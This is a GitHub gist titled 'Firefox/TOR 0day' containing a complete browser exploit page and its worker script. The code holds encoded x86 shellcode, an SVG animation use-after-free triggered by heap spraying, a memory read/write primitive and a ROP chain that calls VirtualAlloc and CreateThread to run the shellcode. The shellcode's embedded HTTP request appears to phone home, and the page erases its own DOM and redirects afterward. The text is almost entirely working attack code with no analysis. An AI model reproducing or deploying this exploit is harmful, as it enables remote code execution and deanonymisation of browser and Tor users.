Instantly share code, notes, and snippets.
Created
November 30, 2016 09:57
-
Star
(0)
0
You must be signed in to star a gist -
Fork
(0)
0
You must be signed in to fork a gist
-
Save dave-theunsub/5556bc2d282116d04cb34583d733905f to your computer and use it in GitHub Desktop.
Firefox/TOR 0day
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<script> | |
var thecode = '\ue8fc\u0089\u0000\u8960\u31e5\u64d2\u528b\u8b30\u0c52\u528b\u8b14\u2872\ub70f\u264a\uff31\uc031\u3cac\u7c61\u2c02\uc120\u0dcf\uc701\uf0e2\u5752\u528b\u8b10\u3c42\ud001\u408b\u8578\u74c0\u014a\u50d0\u488b\u8b18\u2058\ud301\u3ce3\u8b49\u8b34\ud601\uff31\uc031\uc1ac\u0dcf\uc701\ue038\uf475\u7d03\u3bf8\u247d\ue275\u8b58\u2458\ud301\u8b66\u4b0c\u588b\u011c\u8bd3\u8b04\ud001\u4489\u2424\u5b5b\u5961\u515a\ue0ff\u5f58\u8b5a\ueb12\u5d86\u858d\u0297\u0000\u6850\u774c\u0726\ud5ff\uc085\u840f\u0185\u0000\u858d\u029e\u0000\u6850\u774c\u0726\ud5ff\uc085\u840f\u016f\u0000\u90bb\u0001\u2900\u54dc\u6853\u8029\u006b\ud5ff\udc01\uc085\u850f\u0155\u0000\u5050\u5050\u5040\u5040\uea68\udf0f\uffe0\u31d5\uf7db\u39d3\u0fc3\u3a84\u0001\u8900\u68c3\u2705\ue21b\u6866\u5000\uc931\uc180\u6602\u8951\u6ae2\u5210\u6853\ua599\u6174\ud5ff\uc085\u0874\u8dfe\u0248\u0000\ud775\u00b8\u0001\u2900\u89c4\u52e2\u5250\ub668\ude49\uff01\u5fd5\uc481\u0100\u0000\uc085\u850f\u00f6\u0000\ue857\u00fa\u0000\u895e\u8dca\ua7bd\u0002\ | |
ue800\ u00ec\ u0000\ u834f\ u20fa\ u057c\ u20ba\ u0000\ u8900\ u56d1\ ua4f3\ u0db9\ u0000\ u8d00\ u8ab5\ u0002\ uf300\ u89a4\ u44bd\ u0002\ u5e00\ u6856\ u28a9\ u8034\ ud5ff\ uc085\ u840f \u00ae\u0000\u8b66\u0a48\u8366\u04f9\u820f\u00a0\u0000\u408d\u8b0c\u8b00\u8b08\ub809\u0100\u0000\u8950\u29e7\u89c4\u57e6\u5156\u6851\u7248\ub8d2\ud5ff\uc085\uc481\u0104\u0000\ub70f\u830f\u06f9\u7072\u06b9\u0000\ub800\u0010\u0000\uc429\ue789\uca89\ue2d1\u5250\ud231\u168a\ud088\uf024\ue8c0\u3c04\u7709\u0404\ueb30\u0402\u8837\u4707\ud088\u0f24\u093c\u0477\u3004\u02eb\u3704\u0788\u4647\ud4e2\u2959\u89cf\u58fe\uc401\ubd8b\u0244\u0000\ua4f3\u36e8\u0000\u3100\u50c0\u2951\u4fcf\u5357\uc268\u38eb\uff5f\uebd5\u6a09\u6800\u1347\u6f72\ud5ff\u6853\u6e75\u614d\ud5ff\uedeb\uc931\ud1f7\uc031\uaef2\ud1f7\uc349\u0000\u0000\u8d03\ua7bd\u0002\ue800\uffe4\uffff\ub94f\u004f\u0000\ub58d\u026e\u0000\ua4f3\ubd8d\u02a7\u0000\ucbe8\uffff\uc3ff\u0a0d\u6341\u6563\u7470\u452d\u636e\u646f\u6e69\u3a67\u6720\u697a\u0d70\u0d0a\u000a\u0a0d\u6f43\u6b6f\u6569\u203a\u434d\u773d\u3273\u335f\u0032\u5049\u4c48\u4150\u4950\u4700\u5445\u2f20\u6130\u3238\u6131\u3038\u302f\u6435\u3063\u3132\u2032\u5448\u5054\u312f\u312e\u0a0d\ | |
u6f48\u7473\u203a\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u4190'; | |
var worker = new Worker('cssbanner.js'); | |
worker.postMessage(thecode); | |
var svgns = 'http://www.w3.org/2000/svg'; | |
var heap80 = new Array(0x1000); | |
var heap100 = new Array(0x4000); | |
var block80 = new ArrayBuffer(0x80); | |
var block100 = new ArrayBuffer(0x100); | |
var sprayBase = undefined; | |
var arrBase = undefined; | |
var animateX = undefined; | |
var containerA = undefined; | |
var offset = 0x90; | |
if (/.*Firefox\/(4[7-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigator.userAgent)) { | |
offset = 0x88; // versions 47.0 or greater | |
} | |
var $ = function(id) { | |
return document.getElementById(id); | |
} | |
var exploit = function() { | |
var u32 = new Uint32Array(block80) | |
u32[0x2] = arrBase - offset; | |
u32[0x8] = arrBase - offset; | |
u32[0xE] = arrBase - offset; | |
for (i = heap100.length / 2; i < heap100.length; i++) { | |
heap100[i] = block100.slice(0) | |
} | |
for (i = 0; i < heap80.length / 2; i++) { | |
heap80[i] = block80.slice(0) | |
} | |
animateX.setAttribute('begin', '59s') | |
animateX.setAttribute('begin', '58s') | |
for (i = heap80.length / 2; i < heap80.length; i++) { | |
heap80[i] = block80.slice(0) | |
} | |
for (i = heap100.length / 2; i < heap100.length; i++) { | |
heap100[i] = block100.slice(0) | |
} | |
animateX.setAttribute('begin', '10s') | |
animateX.setAttribute('begin', '9s') | |
window.dump('PAUSING!!! YAYA'); | |
containerA.pauseAnimations(); | |
} | |
worker.onmessage = function(e) { | |
worker.onmessage = function(e) { | |
window.setTimeout(function() { | |
worker.terminate(); | |
document.body.innerHTML = ''; | |
document.getElementsByTagName('head')[0].innerHTML = ''; | |
document.body.setAttribute('onload', '') | |
}, 1000); | |
} | |
arrBase = e.data; | |
exploit(); | |
} | |
var idGenerator = function() { | |
return 'id' + | |
(((1 + Math.random()) * 0x10000) | 0).toString(16).substring(1); | |
} | |
var craftDOM = function() { | |
containerA = document.createElementNS(svgns, 'svg') | |
var containerB = document.createElementNS(svgns, 'svg'); | |
animateX = document.createElementNS(svgns, 'animate') | |
var animateA = document.createElementNS(svgns, 'animate') | |
var animateB = document.createElementNS(svgns, 'animate') | |
var animateC = document.createElementNS(svgns, 'animate') | |
var idX = idGenerator(); | |
var idA = idGenerator(); | |
var idB = idGenerator(); | |
var idC = idGenerator(); | |
animateX.setAttribute('id', idX); | |
animateA.setAttribute('id', idA); | |
animateA.setAttribute('end', '50s'); | |
animateB.setAttribute('id', idB); | |
animateB.setAttribute('begin', '60s'); | |
animateB.setAttribute('end', idC + '.end'); | |
animateC.setAttribute('id', idC); | |
animateC.setAttribute('begin', '10s'); | |
animateC.setAttribute('end', idA + '.end'); | |
containerA.appendChild(animateX) | |
containerA.appendChild(animateA) | |
containerA.appendChild(animateB) | |
containerB.appendChild(animateC) | |
document.body.appendChild(containerA); | |
document.body.appendChild(containerB); | |
} | |
window.onload = craftDOM; | |
// | |
</script> | |
<style> | |
#mtdiv { | |
position: absolute; | |
width: 960px; | |
height: 166px; | |
z-index: 15; | |
top: 100px; | |
left: 50%; | |
margin: 0 0 0 -480px; | |
} | |
</style> | |
</head> | |
<body bgcolor='#2F3236'> | |
<div id='mtdiv'> | |
<img src='mt.png' /> | |
</div> | |
</body> | |
<script> | |
setTimeout('window.location = \'member.php\';', 2000); | |
</script> | |
</html> | |
<!-- content of "cssbanner.js" --> | |
<script> | |
self.onmessage = function(msg) { | |
thecode = msg.data; | |
var pack = function(b) { | |
var a = b >> 16; | |
return String.fromCharCode(b & 65535) + String.fromCharCode(a) | |
}; | |
function Memory(b, a, f) { | |
this._base_addr = b; | |
this._read = a; | |
this._write = f; | |
this._abs_read = function(a) { | |
a >= this._base_addr ? a = this._read(a - this._base_addr) : (a = 4294967295 - this._base_addr + 1 + a, a = this._read(a)); | |
return 0 > a ? 4294967295 + a + 1 : a | |
}; | |
this._abs_write = function(a, b) { | |
a >= this._base_addr ? this._write(a - this._base_addr, b) : (a = 4294967295 - this._base_addr + 1 + a, this._write(a, b)) | |
}; | |
this.readByte = function(a) { | |
return this.read(a) & 255 | |
}; | |
this.readWord = function(a) { | |
return this.read(a) & 65535 | |
}; | |
this.readDword = function(a) { | |
return this.read(a) | |
}; | |
this.read = function(a, b) { | |
if (a % 4) { | |
var c = this._abs_read(a & 4294967292), | |
d = this._abs_read(a + 4 & 4294967292), | |
e = a % 4; | |
return c >>> 8 * e | d << | |
8 * (4 - e) | |
} | |
return this._abs_read(a) | |
}; | |
this.readStr = function(a) { | |
for (var b = "", c = 0;;) { | |
if (32 == c) return ""; | |
var d = this.readByte(a + c); | |
if (0 == d) break; | |
b += String.fromCharCode(d); | |
c++ | |
} | |
return b | |
}; | |
this.write = function(a) {} | |
} | |
function PE(b, a) { | |
this.mem = b; | |
this.export_table = this.module_base = void 0; | |
this.export_table_size = 0; | |
this.import_table = void 0; | |
this.import_table_size = 0; | |
this.find_module_base = function(a) { | |
for (a &= 4294901760; a;) { | |
if (23117 == this.mem.readWord(a)) return this.module_base = a; | |
a -= 65536 | |
} | |
}; | |
this._resolve_pe_structures = function() { | |
peFile = this.module_base + this.mem.readWord(this.module_base + 60); | |
if (17744 != this.mem.readDword(peFile)) throw "Bad | |
NT | |
Signature ";this.pe_file=peFile;this.optional_header=this.pe_file+36;this.export_directory=t his.module_base+this.mem.readDword(this.pe_file+120);this.export_directory_size=this.mem.readDword(this.pe_file+124);this.import_directory=this.module_base+this.mem.readDword(this.pe_file+128);this.import_directory_size=this.mem.readDword(this.pe_file+132)};this.resolve_imported_function=function(a,b){void 0==this.import_directory&&this._resolve_pe_structures();for(var e=this.import_directory,c=e+this.import_directory_size;e<c;){var d=this.mem.readStr(this.mem.readDword(e+12)+this.module_base);if(a.toUpperCase()==d .toUpperCase()){for(var c=this.mem.readDword(e)+this.module_base,e=this.mem.readDword(e+16)+this.module_base,d=this.mem.readDword(c),f=0;0!=d;){if(this.mem.readStr(d+this.module_base+2).toUpperCase()==b.toUpperCase())return this.mem.readDword(e+4*f);f++;d=this.mem.readDword(c+4*f)}break}e+=20}return 0};void 0!=a&&this.find_module_base(a)} function ROP(b,a){this.mem=b;this.pe=new PE(b,a);this.pe._resolve_pe_structures();this.module_base=this.pe.module_base+4096;this.findSequence=function(a){for(var b=0;;){for(var e=0,c=0;c<a.length;c++)if(this.mem.readByte(this.module_base+b+c)==a[c]&&e==c)e++;else break;if(e==a.length)return this.module_base+b;b++}};this.findStackPivot=function(){return this.findSequence([148,195])};this.findPopRet=function(a){return this.findSequence([88,195])};this.ropChain=function(a,b,e,c){c=void 0!=c?c:new ArrayBuffer(4096); c=new Uint32Array(c);var d=this.findStackPivot(),f=this.findPopRet( " | |
EAX "),g=this.pe.resolve_imported_function( " | |
kernel32.dll ", " | |
VirtualAlloc ");c[0]=f+1;c[1]=f;c[2]=a+b+4*e+4;c[3]=d;for(i=0;i<e;i++)c[(b>>2)+i]=d;d=(b+4>>2)+e;c[d++]=g;c[d++]=a+(b+4*e+28);c[d++]=a;c[d++]=4096;c[d++]=4096;c[d++]=64;c[d++]=3435973836;return c}} var conv=new ArrayBuffer(8),convf64=new Float64Array(conv),convu32=new Uint32Array(conv),qword2Double=function(b,a){convu32[0]=b;convu32[1]=a;return convf64[0]},doubleFromFloat=function(b,a){convf64[0]=b;return convu32[a]},sprayArrays=function(){for(var b=Array(262138),a=0;262138>a;a++)b[a]=fzero;for(a=0;a < | |
b.length; | |
a += 512) b[a + 1] = memory, b[a + 21] = qword2Double(0, 2), b[a + 14] = qword2Double(arrBase + o1, 0), b[a + (o1 + 8) / 8] = qword2Double(arrBase + o2, 0), b[a + (o2 + 0) / 8] = qword2Double(2, 0), b[a + (o2 + 8) / 8] = qword2Double(arrBase + o3, arrBase + 13), b[a + (o3 + 0) / 8] = qword2Double(16, 0), b[a + (o3 + 24) / 8] = qword2Double(2, 0), b[a + (o3 + 32) / 8] = qword2Double(arrBase + o5, arrBase + o4), b[a + (o4 + 0) / 8] = qword2Double(0, arrBase + o6), b[a + (o5 + 0) / 8] = qword2Double(arrBase + o7, 0), b[a + (o6 + 8) / 8] = qword2Double(2, 0), b[a + (o7 + 8) / 8] = qword2Double(arrBase + o7 + 16, 0), b[a + (o7 + 16) / 8] = qword2Double(0, 4026531840), b[a + (o7 + 32) / 8] = qword2Double(0, 3220176896), b[a + (o7 + 48) / 8] = qword2Double(2, 0), b[a + (o7 + 56) / 8] = qword2Double(1, 0), b[a + (o7 + 96) / 8] = qword2Double(arrBase + o8, arrBase + o8), b[a + (o7 + 112) / 8] = qword2Double(arrBase + o9, arrBase + o9 + 16), b[a + (o7 + 168) / 8] = qword2Double(0, 2), b[a + (o9 + 0) / 8] = qword2Double(arrBase + o10, 2), b[a + (o10 + 0) / 8] = qword2Double(2, 0), b[a + (o10 + 8) / 8] = qword2Double(0, 268435456), b[a + (o11 + 8) / 8] = qword2Double(arrBase + o11 + 16, 0), b[a + (o11 + 16) / 8] = qword2Double(0, 4026531840), b[a + (o11 + 32) / 8] = qword2Double(0, 3220176896), b[a + (o11 + 48) / 8] = qword2Double(2, 0), b[a + (o11 + 56) / 8] = qword2Double(1, 0), b[a + (o11 + 96) / 8] = qword2Double(arrBase + o8, arrBase + o8), b[a + (o11 + 112) / 8] = qword2Double(arrBase + o9, arrBase + o9 + 16), b[a + (o11 + 168) / 8] = qword2Double(0, 2); | |
for (a = 0; a < spr.length; a++) spr[a] = b.slice(0) | |
}, vtable_offset = 300; | |
/.*Firefox\/(41\.0(\.[1-2]|)|42\.0).*/.test(navigator.userAgent) ? vtable_offset = 304 : /.*Firefox\/(4[3-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigator.userAgent) && (vtable_offset = 308); | |
var spr = Array(400), | |
arrBase = 805306416, | |
ropArrBuf = new ArrayBuffer(4096), | |
o1 = 176, | |
o2 = 256, | |
o3 = 768, | |
o4 = 832, | |
o5 = 864, | |
o6 = 928, | |
o7 = 1024, | |
o8 = 1280, | |
o9 = 1344, | |
o10 = 1376, | |
o11 = 1536, | |
oRop = 1792, | |
memory = new Uint32Array(16), | |
len = memory.length, | |
arr_index = 0, | |
arr_offset = 0; | |
fzero = qword2Double(0, 0); | |
0 != thecode.length % 2 && (thecode += "\u9090"); | |
sprayArrays(); | |
postMessage(arrBase); | |
for (memarrayloc = void 0; void 0 == memarrayloc;) | |
for (i = 0; i < spr.length; i++) | |
for (offset = 0; offset < spr[i].length; offset += 512) | |
if ("object" != typeof spr[i][offset + 1]) { | |
memarrayloc = doubleFromFloat(spr[i][offset + 1], 0); | |
arr_index = i; | |
arr_offset = offset; | |
spr[i][offset + (o2 + 0) / 8] = qword2Double(65, 0); | |
spr[i][offset + (o2 + 8) / 8] = qword2Double(arrBase + o3, memarrayloc + 27); | |
for (j = 0; 33 > j; j++) spr[i][offset + (o2 + 16) / 8 + j] = qword2Double(memarrayloc + 27, memarrayloc + 27); | |
spr[i][offset + (o3 + 8) / 8] = qword2Double(0, 0); | |
spr[i][offset + (o5 + 0) / 8] = qword2Double(arrBase + o11, 0); | |
spr[i][offset + (o7 + 168) / 8] = qword2Double(0, 3); | |
spr[i][offset + (o7 + 88) / 8] = qword2Double(0, 2); | |
break | |
} | |
for (; memory.length == len;); | |
var mem = new Memory(memarrayloc + 48, function(b) { | |
return memory[b / 4] | |
}, function(b, a) { | |
memory[b / 4] = a | |
}), | |
xulPtr = mem.readDword(memarrayloc + 12); | |
spr[arr_index][arr_offset + 1] = ropArrBuf; | |
ropPtr = mem.readDword(arrBase + 8); | |
spr[arr_index][arr_offset + 1] = null; | |
ropBase = mem.readDword(ropPtr + 16); | |
var rop = new ROP(mem, xulPtr); | |
rop.ropChain(ropBase, vtable_offset, 10, ropArrBuf); | |
var backupESP = rop.findSequence([137, 1, 195]), | |
ropChain = new Uint32Array(ropArrBuf); | |
ropChain[0] = backupESP; | |
CreateThread = rop.pe.resolve_imported_function("KERNEL32.dll", "CreateThread"); | |
for (var i = 0; i < | |
ropChain.length && 3435973836 != ropChain[i]; i++); | |
ropChain[i++] = 3296825488; | |
ropChain[i++] = 2048; | |
ropChain[i++] = 1347469361; | |
ropChain[i++] = 1528949584; | |
ropChain[i++] = 3092271187; | |
ropChain[i++] = CreateThread; | |
ropChain[i++] = 3096498431; | |
ropChain[i++] = arrBase + 16; | |
ropChain[i++] = 1955274891; | |
ropChain[i++] = 280697892; | |
ropChain[i++] = 704643071; | |
ropChain[i++] = 2425406428; | |
ropChain[i++] = 4294957800; | |
ropChain[i++] = 2425393407; | |
for (var j = 0; j < thecode.length; j += 2) ropChain[i++] = thecode.charCodeAt(j) + 65536 * thecode.charCodeAt(j + 1); | |
spr[arr_index][arr_offset] = qword2Double(arrBase + 16, 0); | |
spr[arr_index][arr_offset + 3] = qword2Double(0, 256); | |
spr[arr_index][arr_offset + 2] = qword2Double(ropBase, 0); | |
spr[arr_index][arr_offset + (o11 + 168) / 8] = qword2Double(0, 3); | |
spr[arr_index][arr_offset + (o11 + 88) / 8] = qword2Double(0, 2); | |
postMessage("GREAT SUCCESS "); }; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment